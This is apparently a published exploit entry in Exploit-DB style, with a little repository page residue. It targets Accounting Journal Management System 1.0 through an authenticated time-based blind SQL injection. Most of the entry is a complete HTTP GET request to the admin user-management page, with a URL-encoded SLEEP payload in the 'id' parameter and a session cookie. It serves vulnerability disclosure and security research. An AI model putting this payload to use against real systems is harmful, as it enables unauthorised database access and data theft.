07b4b32301
4 changes to exploits/shellcodes Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated) Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)
31 lines
No EOL
1.1 KiB
Text
31 lines
No EOL
1.1 KiB
Text
# Exploit Title: Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)
|
|
# Exploit Author: Alperen Ergel
|
|
# Contact: @alpernae (IG/TW)
|
|
# Software Homepage: https://www.sourcecodester.com/php/15155/accounting-journal-management-system-trial-balance-php-free-source-code.html
|
|
# Version : 1.0
|
|
# Tested on: windows 10 xammp | Kali linux
|
|
# Category: WebApp
|
|
# Google Dork: N/A
|
|
# Date: 09.02.2022
|
|
|
|
######## Description ########
|
|
#
|
|
#
|
|
# Authenticate and get update user settings will be appear the
|
|
# id paramater put your payload at there it'll be work
|
|
#
|
|
#
|
|
#
|
|
######## Proof of Concept ########
|
|
|
|
========>>> REQUEST <<<=========
|
|
|
|
GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Connection: close
|
|
Cookie: PHPSESSID=r513r6hug9aqofhlfs3bc7f7qa
|
|
Upgrade-Insecure-Requests: 1 |